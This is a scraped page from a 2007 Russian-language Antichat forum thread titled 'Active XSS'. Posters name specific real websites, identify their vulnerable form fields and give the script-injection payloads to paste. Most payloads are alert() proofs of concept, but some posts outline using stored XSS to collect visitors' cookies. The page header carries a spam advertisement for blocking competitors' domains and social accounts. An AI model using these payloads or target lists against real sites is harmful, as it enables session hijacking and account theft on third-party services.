УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Активные Xss

Страница 8 из 41

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#71

06.07.2007, 22:46

V.I.P

Познающий

Регистрация: 06.04.2007

Сообщений: 77

Провел на форуме:
1062869

Репутация: 136

Отправить сообщение для V.I.P с помощью ICQ

www.internet.ru

Уязвимые поля: "Ваше имя";"Тема".
Добавление комментарий: <script>alert()</script>

Пример: http://www.internet.ru/news/2007-06-17409#comment-16117

Последний раз редактировалось V.I.P; 06.07.2007 в 22:50..

#72

23.07.2007, 11:05

Elvis000

Moderator - Level 7

Регистрация: 23.04.2007

Сообщений: 646

Провел на форуме:
4901399

Репутация: 1035

англииская газетенка

http://www.accringtonobserver.co.uk/news/comments/form.html?story_id=230456

#73

27.07.2007, 00:04

mister

Познающий

Регистрация: 24.07.2007

Сообщений: 31

Провел на форуме:
1417840

Репутация: 35

Отправить сообщение для mister с помощью ICQ

nm.ru
http://www4.nm.ru/users/reg.dhtml?__post=1&login=asdasdasdasd&domain=<scri pt>alert()</script>&passwd=asd&pass2=asd&quest_helper=&quest=& answ=
это пассивная xss.
чтобы сделать ее активной, пишем html-мессагу и подключаем xss через ифрейм.

#74

02.08.2007, 03:37

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

http://www.hotfile.ru
Закачиваем файл любой, в поле "Описание" суем наш зловредный код.
В данном случае

Код:

'"/><script>alert(/xss/)</script>

Получаем линк на скачивание, смотрим - активная хсс
Пример - http://www.hotfile.ru/52377/

http://meetfile.com
Зарегистрировались, заходим в профиль, изменяем его..
Уязвимы все поля...

Код:

'"/><script>alert(/xss/)</script>

Последний раз редактировалось Isis; 02.08.2007 в 03:55..

#75

09.08.2007, 19:12

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

dump.ru
уязвимо поле "Tags:" при заливке файла.

#76

20.08.2007, 01:09

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

Дневник на sestrenka.ru
Заводим дневник->постим сообщение в виде хтмл->собираем куки =)
пример

#77

27.08.2007, 16:48

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

http://www.fos.ru/
Заходим в гостевую книгу, нажимаем создать новое сообщение и пишем:

Код:

'><script>alert('xss')</script>

уязвимы все поля

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

#78

29.08.2007, 17:08

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

http://provodka.ru/news.php?part=3&id=7545
Оставляем комментарий такого содержания:

Код:

"/><script>alert(/xss/)</script>

уязвимы оба поля

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

#79

30.08.2007, 13:58

n3m0

Участник форума

Регистрация: 11.05.2007

Сообщений: 149

Провел на форуме:
6373157

Репутация: 247

Отправить сообщение для n3m0 с помощью ICQ

1. Сервис загрузки файлов на сервер http://ifile.kiev.ua/
В поле "ОПИСАНИЕ" пишем

Код:

'"/><script>alert(/xss/)</script>

Пример http://ifile.kiev.ua/download_file/618/

2. Сервис загрузки файлов на сервер http://www.sendfiles.com.ua
После загрузки файла, в описании пишем

Код:

'><script>alert(/xss/)</script>

Пример http://www.sendfiles.com.ua/24431

UPD
тут же: При добавлении коментария, пишем в поле "Отзыв"

Код:

<script>alert(/xss/)</script>

Последний раз редактировалось n3m0; 30.08.2007 в 15:51..

#80

02.09.2007, 17:08

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

http://www.skoda-russia.ru/resume.php
Оставляем комментарий такого вида:

Код:

"><font color=red onmouseover=javascript:alert('xss')>алерт работает!</font>

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

Страница 8 из 41

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход